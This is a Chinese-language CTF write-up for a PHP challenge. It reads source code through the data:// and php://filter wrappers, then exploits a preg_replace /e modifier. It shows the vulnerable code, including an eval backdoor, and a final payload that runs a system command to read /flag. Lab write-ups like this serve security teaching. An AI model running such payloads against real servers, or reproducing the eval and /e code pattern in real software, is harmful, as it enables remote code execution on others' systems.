题目
php伪协议
file_get_contents函数读取文件内容,内容"I have a dream",可以利用data伪协议,接着通过注释使file=next.php
可用php伪协议读取源码file=php://filter/convert.base64-encode/resource=next.php
base64解码得到
<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;
function complex($re, $str) {
return preg_replace(
'/(' . $re . ')/ei',
'strtolower("\\1")',
$str
);
}
foreach($_GET as $re => $str) {
echo complex($re, $str). "\n";
}
function getFlag(){
@eval($_GET['cmd']);
}
代码审计
preg_replace函数中,用strtolower("\\1")替换正则表达式匹配到的字符串,正则表达式跟$re有关,而$re又是通过GET方法传的参数名称,所以可控,要匹配的$str则是参数值,所以也可控,“\\1”其实就是\1,意思是第一个子匹配项,使用/e修饰符,preg_replace会将 replacement 参数当作 PHP 代码执行。
慎用preg_replace危险的/e修饰符(一句话后门常用) - 稻禾盛夏 - 博客园 (cnblogs.com)
例如:?.*=${phpinfo()},所以
preg_replace('/(' . $re . ')/ei','strtolower("\\1")',$str)变成了
preg_replace('/(.*)/ei','strtolower("\\1")',${phpinfo()})
但会发现'.'变成了下划线,在本地试了一下,发现用'\S*'可行,至于为什么'.'变成下划线,可参考
至于为什么写成${phpinfo()}形式,是因为/e模式下会执行'strtolower("\\1")',而\1匹配到${phpinfo()},所以执行strtolower("${phpinfo()}"),而在php中双引号里的变量会被解析(可参考PHP: 可变变量 - Manual),单引号不会,因此phpinfo()会执行并返回true,也就是"1",最终变成了${1},echo输出空字符串
payload
?text=data://text/plain,I have a dream&file=next.php&\S*=${getflag()}&cmd=system('cat /flag');
得到flag